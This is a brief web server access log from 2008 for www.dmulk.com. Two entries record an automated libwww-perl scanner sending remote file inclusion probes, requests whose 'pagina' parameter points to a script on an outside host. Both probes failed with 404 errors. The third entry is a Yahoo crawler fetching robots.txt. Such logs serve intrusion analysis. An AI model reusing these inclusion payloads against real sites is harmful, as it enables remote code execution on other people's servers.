202.53.24.188 - - [08/Apr/2008:13:21:08 -0700] "GET /index2.php?pagina=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.24.188 - - [08/Apr/2008:13:21:09 -0700] "GET /logs/index2.php?pagina=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.126 - - [08/Apr/2008:13:21:30 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
